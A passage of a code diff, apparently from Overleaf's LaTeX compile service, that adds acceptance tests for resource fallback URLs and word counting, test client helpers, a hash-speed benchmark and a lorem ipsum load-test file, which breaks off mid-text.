Server.getFile.restore() + }) + + return it('should download the image again', function () { + return Server.getFile.called.should.equal(true) + }) + }) + + describe('fallbackURL', function () { + describe('when the primary resource is available', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `/project/${Server.randomId()}/file/${Server.randomId()}` + this.fallback = `/bucket/project-blobs/key/ab/cd/${Server.randomId()}` + this.request = { + 
resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + { + path: 'lion.png', + url: `http://filestore${this.file}`, + fallbackURL: `http://filestore${this.fallback}`, + }, + ], + } + + sinon.spy(Server, 'getFile') + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + after(function () { + return Server.getFile.restore() + }) + + it('should download from the primary', function () { + Server.getFile.calledWith(this.file).should.equal(true) + }) + it('should not download from the fallback', function () { + Server.getFile.calledWith(this.fallback).should.equal(false) + }) + + it('should gather metrics', function (done) { + request.get(`${Settings.apis.clsi.url}/metrics`, (err, res, body) => { + if (err) return done(err) + body + .split('\n') + .some(line => { + return ( + line.startsWith('url_source') && + line.includes('path="user-files"') + ) + }) + .should.equal(true) + done() + }) + }) + }) + + describe('when the primary resource is not available', function () { + before(function (done) { + this.project_id = Client.randomId() + this.file = `/project/${Server.randomId()}/file/${Server.randomId()}` + this.fallback = `/bucket/project-blobs/key/ab/cd/${Server.randomId()}` + this.request = { + resources: [ + { + path: 'main.tex', + content: `\ +\\documentclass{article} +\\usepackage{graphicx} +\\begin{document} +\\includegraphics{lion.png} +\\end{document}\ +`, + }, + { + path: 'lion.png', + url: `http://filestore/not-found`, + fallbackURL: `http://filestore${this.fallback}`, + }, + ], + } + + sinon.spy(Server, 'getFile') + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + after(function () { + return Server.getFile.restore() + }) + + it('should download from the fallback', function () { + Server.getFile.calledWith(`/not-found`).should.equal(true) + Server.getFile.calledWith(this.fallback).should.equal(true) + }) + + it('should gather metrics', function (done) { + request.get(`${Settings.apis.clsi.url}/metrics`, (err, res, body) => { + if (err) return done(err) + body + .split('\n') + .some(line => { + return ( + line.startsWith('url_source') && + line.includes('path="project-blobs"') + ) + }) + .should.equal(true) + done() + }) + }) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/WordcountTests.js b/services/clsi/test/acceptance/js/WordcountTests.js new file mode 100644 index 0000000..626b5d7 --- /dev/null +++ b/services/clsi/test/acceptance/js/WordcountTests.js @@ -0,0 +1,71 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
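+// Compiles the naugty_strings.txt fixture and asserts the exact texcount
+// summary (word, header and inline-math counts) returned by the wordcount
+// endpoint.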
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const Client = require('./helpers/Client') +const request = require('request') +const { expect } = require('chai') +const path = require('node:path') +const fs = require('node:fs') +const ClsiApp = require('./helpers/ClsiApp') + +describe('Wordcount', function () { + before(function (done) { + this.request = { + resources: [ + { + path: 'main.tex', + content: fs.readFileSync( + path.join(__dirname, '../fixtures/naugty_strings.txt'), + 'utf-8' + ), + }, + ], + } + this.project_id = Client.randomId() + return ClsiApp.ensureRunning(() => { + return Client.compile( + this.project_id, + this.request, + (error, res, body) => { + this.error = error + this.res = res + this.body = body + return done() + } + ) + }) + }) + + return describe('wordcount file', function () { + return it('should return wordcount info', function (done) { + return Client.wordcount(this.project_id, 'main.tex', (error, result) => { + if (error != null) { + throw error + } + expect(result).to.deep.equal({ + texcount: { + encode: 'utf8', + textWords: 2281, + headWords: 2, + outside: 0, + headers: 2, + elements: 0, + mathInline: 6, + mathDisplay: 0, + errors: 0, + messages: '', + }, + }) + return done() + }) + }) + }) +}) diff --git a/services/clsi/test/acceptance/js/helpers/Client.js b/services/clsi/test/acceptance/js/helpers/Client.js new file mode 100644 index 0000000..a0bdce7 --- /dev/null +++ b/services/clsi/test/acceptance/js/helpers/Client.js @@ -0,0 +1,248 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let Client +const express = require('express') +const request = require('request') +const fs = require('node:fs') +const Settings = require('@overleaf/settings') + +module.exports = Client = { + host: Settings.apis.clsi.url, + + randomId() { + return Math.random().toString(16).slice(2) + }, + + compile(projectId, data, callback) { + if (callback == null) { + callback = function () {} + } + if (data) { + // Enable pdf caching unless disabled explicitly.
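+      // Caller-supplied options take precedence, since later Object.assign
+      // sources overwrite earlier ones.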
+ data.options = Object.assign({}, { enablePdfCaching: true }, data.options) + } + return request.post( + { + url: `${this.host}/project/${projectId}/compile`, + json: { + compile: data, + }, + }, + callback + ) + }, + + clearCache(projectId, callback) { + if (callback == null) { + callback = function () {} + } + return request.del(`${this.host}/project/${projectId}`, callback) + }, + + getOutputFile(response, type) { + for (const file of Array.from(response.compile.outputFiles)) { + if (file.type === type && file.url.match(`output.${type}`)) { + return file + } + } + return null + }, + + runFakeFilestoreService(directory) { + const app = express() + app.use(express.static(directory)) + this.startFakeFilestoreApp(app) + }, + + startFakeFilestoreApp(app) { + let server + before(function (done) { + server = app.listen(error => { + if (error) { + done(new Error('error starting server: ' + error.message)) + } else { + const addr = server.address() + Settings.filestoreDomainOveride = `http://127.0.0.1:${addr.port}` + done() + } + }) + }) + after(function (done) { + server.close(done) + }) + }, + + syncFromCode(projectId, file, line, column, callback) { + Client.syncFromCodeWithImage(projectId, file, line, column, '', callback) + }, + + syncFromCodeWithImage(projectId, file, line, column, imageName, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${this.host}/project/${projectId}/sync/code`, + qs: { + imageName, + file, + line, + column, + }, + json: true, + }, + (error, response, body) => { + if (error != null) { + return callback(error) + } + if (response.statusCode !== 200) { + return callback(new Error(`statusCode=${response.statusCode}`), body) + } + return callback(null, body) + } + ) + }, + + syncFromPdf(projectId, page, h, v, callback) { + Client.syncFromPdfWithImage(projectId, page, h, v, '', callback) + }, + + syncFromPdfWithImage(projectId, page, h, v, imageName, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${this.host}/project/${projectId}/sync/pdf`, + qs: { + imageName, + page, + h, + v, + }, + json: true, + }, + (error, response, body) => { + if (error != null) { + return callback(error) + } + if (response.statusCode !== 200) { + return callback(new Error(`statusCode=${response.statusCode}`), body) + } + return callback(null, body) + } + ) + }, + + compileDirectory(projectId, baseDirectory, directory, callback) { + if (callback == null) { + callback = function () {} + } + const resources = [] + let entities = fs.readdirSync(`${baseDirectory}/${directory}`) + let rootResourcePath = 'main.tex' + while (entities.length > 0) { + const entity = entities.pop() + const stat = fs.statSync(`${baseDirectory}/${directory}/${entity}`) + if (stat.isDirectory()) { + entities = entities.concat( + fs + .readdirSync(`${baseDirectory}/${directory}/${entity}`) + .map(subEntity => { + if (subEntity === 'main.tex') { + rootResourcePath = `${entity}/${subEntity}` + } + return `${entity}/${subEntity}` + }) + ) + } else if (stat.isFile() && entity !== 'output.pdf') { + const extension = entity.split('.').pop() + if ( + [ + 'tex', + 'bib', + 'cls', + 'sty', + 'pdf_tex', + 'Rtex', + 'ist', + 'md', + 'Rmd', + 'Rnw', + ].indexOf(extension) > -1 + ) { + resources.push({ + path: entity, + content: fs + .readFileSync(`${baseDirectory}/${directory}/${entity}`) + .toString(), + }) + } else if ( + ['eps', 'ttf', 'png', 'jpg', 'pdf', 'jpeg'].indexOf(extension) > -1 + ) { + resources.push({ + path: 
entity, + url: `http://filestore/${directory}/${entity}`, + modified: stat.mtime, + }) + } + } + } + + return fs.readFile( + `${baseDirectory}/${directory}/options.json`, + (error, body) => { + const req = { + resources, + rootResourcePath, + } + + if (error == null) { + body = JSON.parse(body) + req.options = body + } + + return this.compile(projectId, req, callback) + } + ) + }, + + wordcount(projectId, file, callback) { + const image = undefined + Client.wordcountWithImage(projectId, file, image, callback) + }, + + wordcountWithImage(projectId, file, image, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${this.host}/project/${projectId}/wordcount`, + qs: { + image, + file, + }, + }, + (error, response, body) => { + if (error != null) { + return callback(error) + } + if (response.statusCode !== 200) { + return callback(new Error(`statusCode=${response.statusCode}`), body) + } + return callback(null, JSON.parse(body)) + } + ) + }, +} diff --git a/services/clsi/test/acceptance/js/helpers/ClsiApp.js b/services/clsi/test/acceptance/js/helpers/ClsiApp.js new file mode 100644 index 0000000..38308e9 --- /dev/null +++ b/services/clsi/test/acceptance/js/helpers/ClsiApp.js @@ -0,0 +1,50 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const app = require('../../../../app') +const Settings = require('@overleaf/settings') + +module.exports = { + running: false, + initing: false, + callbacks: [], + ensureRunning(callback) { + if (callback == null) { + callback = function () {} + } + if (this.running) { + return callback() + } else if (this.initing) { + return this.callbacks.push(callback) + } else { + this.initing = true + this.callbacks.push(callback) + return app.listen( + Settings.internal.clsi.port, + Settings.internal.clsi.host, + error => { + if (error != null) { + throw error + } + this.running = true + + return (() => { + const result = [] + for (callback of Array.from(this.callbacks)) { + result.push(callback()) + } + return result + })() + } + ) + } + }, +} diff --git a/services/clsi/test/bench/hashbench.js b/services/clsi/test/bench/hashbench.js new file mode 100644 index 0000000..1e19af6 --- /dev/null +++ b/services/clsi/test/bench/hashbench.js @@ -0,0 +1,73 @@ +const ContentCacheManager = require('../../app/js/ContentCacheManager') +const fs = require('node:fs') +const crypto = require('node:crypto') +const path = require('node:path') +const os = require('node:os') +const async = require('async') +const _createHash = crypto.createHash + +const files = process.argv.slice(2) + +function test(hashType, filePath, callback) { + // override the default hash in ContentCacheManager + crypto.createHash = function (hash) { + if (hashType === 'hmac-sha1') { + return crypto.createHmac('sha1', 'a secret') + } + hash = hashType + return _createHash(hash) + } + fs.mkdtemp(path.join(os.tmpdir(), 'pdfcache'), (err, dir) => { + if (err) { + return callback(err) + } + const t0 = process.hrtime.bigint() + ContentCacheManager.update(dir, filePath, x => { + const t1 = process.hrtime.bigint() + 
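+      // hrtime.bigint() timestamps are in nanoseconds; dividing by 1e6 below
+      // converts them to milliseconds. This first update() call is the
+      // cold-cache run; the second one below measures the warm-cache case.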
const cold = Number(t1 - t0) / 1e6 + ContentCacheManager.update(dir, filePath, x => { + const t2 = process.hrtime.bigint() + const warm = Number(t2 - t1) / 1e6 + fs.rm(dir, { recursive: true, force: true }, err => { + if (err) { + return callback(err) + } + console.log( + 'uvthreads', + process.env.UV_THREADPOOL_SIZE, + filePath, + 'hashType', + hashType, + 'cold-start', + cold.toFixed(2), + 'ms', + 'warm-start', + warm.toFixed(2), + 'ms' + ) + callback(null, [hashType, cold, warm]) + }) + }) + }) + }) +} + +const jobs = [] +files.forEach(file => { + jobs.push(cb => { + test('md5', file, cb) + }) + jobs.push(cb => { + test('sha1', file, cb) + }) + jobs.push(cb => { + test('hmac-sha1', file, cb) + }) + jobs.push(cb => { + test('sha256', file, cb) + }) +}) + +async.timesSeries(10, (n, cb) => { + async.series(jobs, cb) +}) diff --git a/services/clsi/test/load/js/bulk.tex b/services/clsi/test/load/js/bulk.tex new file mode 100644 index 0000000..67c4772 --- /dev/null +++ b/services/clsi/test/load/js/bulk.tex @@ -0,0 +1,234 @@ + +Lorem ipsum dolor sit amet, consectetur adipiscing elit. In tincidunt mattis sapien at tempor. Mauris ac tristique erat. Praesent interdum ipsum sem, ac fermentum urna imperdiet in. Nulla tincidunt purus vitae ipsum sagittis tincidunt. Aenean id nisi ullamcorper, ultrices mi vel, iaculis nunc. Sed vel varius metus, ac eleifend mauris. Donec sed orci fringilla, fermentum nulla vehicula, sodales purus. + +Maecenas nulla quam, congue vitae pellentesque sed, bibendum eu felis. Vestibulum congue gravida diam, in venenatis nisl lacinia id. Nullam eget purus ac enim dignissim consectetur vel at dolor. Integer rhoncus nisl eu odio luctus, at placerat dolor congue. Fusce sodales molestie sem eget scelerisque. Sed eros tellus, tempor eu commodo nec, maximus imperdiet eros. Aliquam vulputate ligula non bibendum tempus. In commodo eros ante, ultrices condimentum purus finibus ut. Suspendisse at eleifend mauris, vitae tincidunt sapien. Curabitur orci ipsum, aliquet a cursus efficitur, lacinia ac ex. Integer lacinia bibendum dui ut ullamcorper. Curabitur in ultricies tellus, quis ullamcorper sem. Praesent sodales dui odio. Ut lacinia aliquet eros, ut maximus nisi. Donec sit amet dui a neque interdum dapibus. + +Ut vulputate sem in lectus porttitor ullamcorper. Nulla ut urna vitae tellus posuere aliquam vitae in odio. Praesent placerat laoreet viverra. Curabitur lacinia est lectus, eget euismod nisi viverra eget. Aliquam facilisis lectus ut tincidunt mollis. Donec ut rhoncus lorem. Vivamus ultricies venenatis congue. Etiam non risus quis leo sodales lacinia. Phasellus commodo feugiat sem quis dignissim. Nunc augue dui, bibendum sed leo vitae, malesuada vulputate sem. + +Quisque nec semper nulla. Etiam dictum blandit interdum. Morbi leo leo, scelerisque vel enim vel, egestas volutpat ligula. Maecenas ac elementum lacus. Duis molestie nunc id metus iaculis, in hendrerit massa egestas. Praesent feugiat tempor dui, sit amet ultrices dui elementum id. Suspendisse cursus accumsan diam, non imperdiet diam dapibus facilisis. Praesent blandit urna felis, eget sodales nisi dictum non. Cras finibus quis augue a venenatis. In pretium condimentum arcu, at vehicula ex gravida ut. Etiam congue urna ipsum, mattis interdum neque cursus bibendum. + +Morbi felis orci, ultricies eget magna gravida, blandit condimentum erat. Curabitur convallis quam eros, eu porta diam ornare vitae. Interdum et malesuada fames ac ante ipsum primis in faucibus. 
Sed eleifend convallis massa, eget tristique dolor iaculis sed. Mauris id nunc erat. Donec semper rhoncus libero sit amet rhoncus. Suspendisse cursus suscipit augue quis fermentum. Sed in maximus erat. + +Ut ultrices massa vitae lectus dictum fermentum. Cras vitae risus metus. Curabitur eleifend hendrerit dolor sit amet rutrum. Pellentesque pellentesque dolor ut felis vehicula pharetra. Nam id ante eget turpis vehicula interdum in vitae odio. Nullam nec orci interdum, commodo massa et, rutrum purus. Aenean vitae porta sem. Nam in lacinia turpis. Duis dui ligula, molestie quis sagittis sit amet, faucibus ac leo. Curabitur sit amet porta ligula. Integer et sollicitudin velit. Donec magna justo, ultricies eu nunc ut, rutrum aliquam orci. Sed in dignissim sem. Proin rutrum velit urna, eu tincidunt ipsum fermentum non. Morbi id cursus nisl. + +Curabitur sed gravida ex, posuere laoreet orci. Morbi ac lacus quis tortor faucibus feugiat. Etiam fringilla lacinia libero. Duis varius sem vel lorem euismod luctus. Fusce tincidunt quis sem in ullamcorper. Ut luctus massa aliquam hendrerit finibus. Ut venenatis, neque eu hendrerit finibus, nisl tortor venenatis eros, in imperdiet leo est quis erat. Fusce luctus posuere massa, ut fermentum sapien blandit ut. Maecenas feugiat consequat lorem, eget sagittis elit vestibulum sit amet. Vivamus molestie ante ut turpis laoreet facilisis vitae eu diam. Integer a tempor tortor. In hac habitasse platea dictumst. Quisque arcu est, blandit eu justo sed, posuere congue nisi. Aliquam magna augue, convallis ac scelerisque vel, cursus eget dui. Nam rutrum auctor odio, vel sagittis ipsum gravida vel. + +Etiam elementum placerat egestas. Morbi nec mi posuere, congue ligula eu, sagittis turpis. Fusce urna nisi, dapibus in pretium et, lobortis eu arcu. Curabitur ornare urna mauris, vitae varius nulla posuere in. Integer faucibus euismod dui, a venenatis massa vehicula sit amet. Donec fringilla tellus vitae ligula pretium mattis. Aliquam aliquet quam augue, a luctus orci euismod sed. Morbi tincidunt tincidunt nulla, eget elementum turpis congue id. Suspendisse pellentesque nulla leo, fermentum ultrices massa sollicitudin vel. Morbi vel nisl consectetur, pulvinar sapien a, accumsan diam. Morbi posuere auctor nibh, nec maximus ante tincidunt ac. Etiam ut erat consectetur, molestie est sit amet, pharetra nulla. Quisque varius vestibulum ex, eget feugiat enim molestie ac. Nulla quis imperdiet risus. + +Nullam nec tempor arcu. Duis fringilla mi at magna dignissim, quis feugiat turpis lacinia. Nunc sed aliquet ipsum. Curabitur at dolor in dui posuere ornare a ut ex. Ut congue neque quis justo iaculis, ut accumsan odio condimentum. Donec sed tempus diam. Phasellus tincidunt malesuada dui, nec gravida justo volutpat vel. Praesent mi purus, sagittis in imperdiet sed, sodales eu turpis. Nullam rutrum non lacus ac imperdiet. Ut ultrices lorem at facilisis feugiat. Morbi eros enim, tristique at nisl ut, venenatis porttitor ligula. Nullam sed diam at nibh tristique consectetur. Phasellus iaculis justo nisi, ut interdum ante rutrum sit amet. Pellentesque finibus felis blandit metus pulvinar lacinia. + +Aliquam erat volutpat. Nulla eu tortor sit amet tellus bibendum tristique eget consequat metus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut in aliquet augue. Phasellus laoreet nulla convallis finibus vehicula. Fusce et urna dui. Duis vel porta nunc. Nunc condimentum, justo at efficitur dignissim, lorem diam elementum ex, at dictum lectus sapien ac neque. 
Aliquam lacinia et ipsum lacinia efficitur. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Phasellus convallis urna orci, et dictum sapien porta sit amet. Maecenas euismod dolor mattis sapien vestibulum pulvinar. + +Vestibulum eget posuere purus, et viverra est. Nullam egestas massa et finibus semper. Vestibulum egestas porta ante eget maximus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque bibendum magna et fermentum consequat. Duis non arcu quis justo dignissim tempus at id diam. Praesent condimentum vel leo ac efficitur. Phasellus sollicitudin ipsum ut consectetur euismod. Proin diam eros, placerat sed dui ac, porttitor pellentesque nibh. Curabitur fermentum volutpat enim, in ullamcorper ipsum euismod et. Nunc a justo tortor. Phasellus libero nunc, consectetur ut dolor non, volutpat condimentum metus. + +Ut tincidunt est sem, eu venenatis lectus pretium pretium. Vivamus venenatis, erat nec sollicitudin semper, justo nulla euismod dui, quis tempor libero lectus sit amet neque. Sed in iaculis ipsum. Quisque ultricies sed mi a consequat. Sed tincidunt ante ut turpis vehicula, sed fringilla ligula efficitur. Cras eget suscipit sapien. Ut sed malesuada est, ut tempor leo. Mauris dignissim turpis quis turpis placerat cursus. Vivamus dictum dui sed blandit aliquet. + +Ut cursus, nulla eget ultricies tempor, magna enim aliquam libero, eget tempus mauris mauris ut elit. Nulla a mi quam. Integer ullamcorper ex et enim ornare efficitur. Vivamus tellus orci, pharetra in suscipit ac, ultrices sit amet sapien. Pellentesque pretium mauris vel orci accumsan, a hendrerit lectus sagittis. Mauris id nisi commodo, eleifend arcu in, vestibulum metus. Fusce vulputate gravida tincidunt. Nulla cursus non tortor ut tincidunt. Phasellus vel nisi tempus, fringilla lectus sed, ultricies erat. Ut gravida, enim id facilisis consequat, est nisi scelerisque magna, eget pharetra elit mi elementum ligula. Morbi hendrerit tortor eget velit rhoncus, consequat porta nisl aliquet. Nam diam turpis, ullamcorper vitae nisi eu, ultrices hendrerit magna. Vivamus eget pretium elit. Vivamus vitae odio sit amet libero hendrerit imperdiet. + +Aenean pharetra ex eget lectus sodales placerat. Fusce quis orci vel est suscipit venenatis. Curabitur maximus, sem in tincidunt imperdiet, nisl lorem venenatis mauris, eget facilisis lectus mauris a eros. Nam luctus sem ac diam ultrices, eget vulputate tortor efficitur. Nunc fermentum condimentum lacus id faucibus. Nunc ut tellus pretium, mattis eros vitae, scelerisque felis. Aenean ligula nulla, vulputate id eros id, vestibulum vulputate odio. Nunc in elit id augue porttitor auctor sed vitae lacus. Integer enim orci, auctor at magna eget, viverra tempus risus. Nulla suscipit metus tortor, ultricies vestibulum odio euismod at. Etiam consequat diam ac leo dignissim vulputate. Donec lectus lorem, finibus sed purus ac, eleifend condimentum ipsum. + +Fusce ornare metus vel dui scelerisque vehicula. Proin dictum sapien nec auctor congue. Nunc id erat sed velit facilisis tincidunt. In convallis eu diam id aliquam. Suspendisse eu nisl ante. Sed sit amet arcu non erat sagittis vehicula. Quisque pellentesque at lectus quis maximus. Nam mollis nulla interdum lobortis egestas. Fusce eu tellus eget libero pretium venenatis quis tristique justo. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Proin tempor suscipit enim, eget lacinia augue malesuada sit amet. 
Ut ornare massa in magna pulvinar sagittis. Etiam non risus mi. Aenean aliquam dui et risus egestas aliquet. + +Aenean semper dui risus. Aenean consequat id elit a finibus. Sed vitae est sed arcu interdum maximus interdum in leo. Donec justo lorem, dictum sed placerat sit amet, eleifend in justo. Integer efficitur metus id interdum fringilla. Morbi et dui vitae libero consectetur fermentum quis sed quam. Sed interdum aliquam lorem, at blandit lectus fermentum a. Aliquam ac mollis felis, ut vulputate massa. Praesent convallis cursus eleifend. Donec non sem auctor, efficitur nisi ac, egestas libero. Nullam turpis lacus, dignissim eget pellentesque sed, fermentum ut ipsum. Vestibulum a posuere lacus, vitae rutrum neque. In hac habitasse platea dictumst. Sed vel maximus sem. Etiam dapibus risus et consectetur auctor. Phasellus vestibulum posuere sagittis. + +Aliquam nec libero at velit rhoncus pretium. Curabitur tristique blandit orci id vestibulum. Praesent in tempus arcu. Vivamus in felis tellus. Nunc ac fermentum massa. Cras nisi mi, sollicitudin eu maximus vitae, sodales gravida lorem. Vivamus mollis metus id lectus rhoncus consequat. In dui tellus, vulputate sit amet purus vel, volutpat ornare turpis. Fusce vitae massa non ligula lobortis rhoncus eget id sapien. Sed nec tempus lectus. Proin tempor risus ipsum, fermentum suscipit felis cursus sit amet. + +Maecenas ut dignissim ante, vitae ornare lorem. Fusce nec convallis eros, sed finibus urna. Proin ut finibus dolor. In non nunc sed dui aliquam suscipit. Etiam semper varius ex, sed venenatis sem gravida in. Interdum et malesuada fames ac ante ipsum primis in faucibus. Phasellus tempus aliquet placerat. Nam odio mauris, pharetra ac felis vel, ornare cursus nisl. Phasellus elit risus, finibus id ornare ut, scelerisque sed nisi. Curabitur aliquet, magna in finibus congue, dui libero auctor dui, ut fermentum metus enim vitae ex. Duis at elementum tellus. + +Suspendisse laoreet luctus sem sit amet tempor. Vestibulum non lorem fringilla, maximus nisl vel, pulvinar enim. Suspendisse egestas elit et sem sagittis rhoncus. Morbi nulla augue, semper euismod ultricies quis, maximus et lorem. Nulla nec posuere justo. Ut blandit nisl vitae turpis varius finibus. Donec porttitor eros neque, id mollis neque tempus et. Maecenas a massa placerat, laoreet nisl vel, venenatis diam. + +Phasellus at leo vel nisi aliquet placerat. Vestibulum luctus erat quis velit laoreet auctor. Aenean ultricies nulla tristique metus commodo, id fermentum justo tristique. Nullam ut tincidunt libero. Suspendisse volutpat, lacus ac congue ultricies, metus mi imperdiet magna, in maximus turpis ex eget leo. Sed lorem nibh, vestibulum id sodales ac, sagittis at elit. Curabitur purus nunc, sodales eget vehicula vitae, bibendum gravida diam. Nullam dignissim consequat pharetra. Nullam a diam consectetur, mollis odio sed, blandit lectus. Vestibulum eu velit id massa varius sagittis. Quisque tempor ante ac mauris rhoncus molestie. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. + +Ut sit amet euismod mi. Nulla facilisis est posuere, feugiat est et, dictum nulla. Proin eleifend ultricies nunc. Sed commodo justo nisi, id suscipit massa malesuada ut. Donec aliquam nibh tellus, vitae gravida lectus ultricies quis. Nam pulvinar lobortis erat sit amet convallis. Sed quis magna facilisis, tincidunt dui non, hendrerit nunc. Morbi egestas, risus fringilla fermentum porttitor, nunc velit viverra mi, non sodales augue arcu ac sapien. 
Duis blandit urna at nisl pellentesque semper. Nulla et malesuada nulla. Aenean tristique tortor odio, sit amet luctus odio aliquam id. Phasellus facilisis lorem vitae velit aliquam imperdiet. Cras faucibus dolor eget neque fringilla, ut mattis ex hendrerit. Integer molestie porttitor sagittis. + +Pellentesque diam quam, auctor eget tristique eget, molestie sit amet est. Pellentesque a eros non dui gravida volutpat. Donec molestie blandit nunc ac interdum. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse lobortis, neque non aliquet convallis, lectus ex venenatis ex, quis malesuada massa erat non dolor. In tristique, enim eu ultrices ultricies, lectus ligula pretium orci, commodo cursus ante est vel odio. Sed quis accumsan purus. Nam fringilla ex ut urna vestibulum, et feugiat diam ultrices. Vivamus tempus felis ac quam blandit convallis. + +Vestibulum eros erat, volutpat in est at, blandit pharetra sapien. Interdum et malesuada fames ac ante ipsum primis in faucibus. Aenean quis enim orci. Aliquam imperdiet vel arcu ac sagittis. Mauris vitae augue sed metus commodo ornare. Nulla malesuada tellus nisl, eu vestibulum ante mollis a. Sed sagittis euismod nunc, sit amet hendrerit tortor condimentum eu. + +Praesent lacinia massa eget mi auctor placerat. Fusce porttitor augue lectus, a cursus ante dictum vel. Vestibulum ultrices vel mauris in fermentum. Nunc tincidunt non magna sed pharetra. Donec porttitor rutrum arcu, vitae tincidunt lacus suscipit ac. Aliquam lorem mauris, pulvinar non dignissim sed, pulvinar vitae dui. Donec id neque eu velit imperdiet lacinia nec eu magna. Ut a purus sit amet nulla venenatis vulputate. Integer vulputate est sem, iaculis porttitor mi mattis et. Phasellus condimentum ipsum eget tellus viverra, a tincidunt nunc feugiat. Praesent posuere aliquam ex et faucibus. Nullam pretium felis id mauris luctus, a luctus eros sodales. + +Mauris et condimentum velit. Praesent id dignissim odio. Phasellus nisl velit, molestie sed nisi et, sollicitudin tempor nisi. Pellentesque lacus eros, ultricies non leo sit amet, porttitor ullamcorper ipsum. Vestibulum maximus lorem ac justo tempus imperdiet. Suspendisse rhoncus, mi in commodo tempus, orci turpis feugiat dui, nec facilisis arcu diam ut mauris. Vestibulum risus ligula, ornare non cursus vel, pellentesque non augue. Morbi eu gravida arcu. Nunc sed fermentum lacus. Nulla id quam aliquet, aliquet lacus in, rutrum metus. Duis tristique sodales risus vel interdum. Integer rhoncus nibh eget semper malesuada. Nunc sit amet ante diam. Fusce tincidunt aliquam ex, at lobortis tellus porttitor non. Vestibulum tincidunt iaculis dui vel scelerisque. + +Aliquam sagittis mauris eget massa accumsan viverra. Pellentesque luctus sit amet augue ac scelerisque. Praesent imperdiet nisi dolor, sed malesuada est commodo at. Aenean vel leo eget felis tincidunt interdum. Fusce orci mauris, egestas eget lectus et, finibus consectetur urna. Donec ut dapibus elit, eu lacinia neque. Ut et accumsan nulla. Sed ullamcorper ligula purus, eu dapibus nunc auctor vel. Ut convallis consectetur dapibus. Curabitur eget porttitor felis. Maecenas pretium ac leo vitae volutpat. Donec in augue sit amet lorem efficitur dignissim. + +Praesent iaculis tristique rutrum. Pellentesque id odio vel purus bibendum sodales suscipit id odio. Nullam ac velit imperdiet, imperdiet nisi sed, malesuada ipsum. Quisque varius dictum efficitur. Phasellus efficitur varius imperdiet. 
Aenean facilisis libero non augue porttitor, nec interdum felis imperdiet. Etiam et libero id elit commodo tincidunt. Nullam rutrum odio id rutrum tristique. Cras vehicula aliquet risus ac elementum. Duis nisl urna, commodo eget ante et, vehicula tempus lacus. + +Mauris eu sapien sed erat auctor volutpat vel vel tortor. Aenean in commodo felis. Donec a dui a urna varius aliquet quis at nisi. Pellentesque et urna lacinia, commodo arcu at, laoreet lectus. Aliquam sodales, massa in convallis aliquam, dui orci eleifend arcu, a gravida mauris magna sed arcu. Ut ac lectus in risus feugiat lobortis. Nulla quis est eget dui pharetra ultricies eget at risus. Phasellus sagittis molestie ligula, eget egestas orci volutpat vitae. + +Fusce nec finibus ligula, sed volutpat tortor. Sed placerat quam fringilla augue pharetra dictum. Proin ornare mi erat, eget sollicitudin ligula venenatis vitae. Aliquam semper sagittis urna rutrum pharetra. Vivamus lacinia mattis erat, vitae ultrices arcu. Maecenas id lacus eget justo imperdiet vehicula commodo a leo. Quisque vitae eros interdum, posuere ex ornare, tincidunt lectus. + +Vestibulum hendrerit sed libero et bibendum. Sed ornare eu massa ut vestibulum. Curabitur imperdiet odio felis, at ullamcorper eros rhoncus nec. Cras commodo nisl eu augue iaculis posuere. Aliquam massa tortor, consectetur quis dui in, mollis dictum tellus. Fusce porttitor dapibus arcu. Fusce finibus pretium porttitor. + +Proin dapibus viverra nisi. Cras ullamcorper purus et consequat fermentum. Duis imperdiet in dui in imperdiet. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam quis enim at ipsum ultricies auctor scelerisque nec nulla. Vivamus ut efficitur enim. Quisque dictum quam ac dui iaculis efficitur. Morbi at nulla convallis, condimentum tellus sit amet, dapibus nunc. Morbi metus felis, commodo sit amet justo id, finibus sagittis lorem. Nam nisi diam, fermentum dapibus varius in, convallis eu leo. Phasellus ut nunc orci. Sed tincidunt mauris in ante consequat, id bibendum libero volutpat. Aliquam a dictum libero. Etiam massa odio, congue ut lorem tincidunt, elementum egestas ligula. + +Ut semper arcu a lectus interdum euismod. Curabitur nec ultrices neque. In eget sapien nulla. Pellentesque pellentesque faucibus urna id placerat. Aenean condimentum posuere interdum. Etiam vel tristique lorem, in dapibus urna. Vestibulum facilisis lobortis metus ac 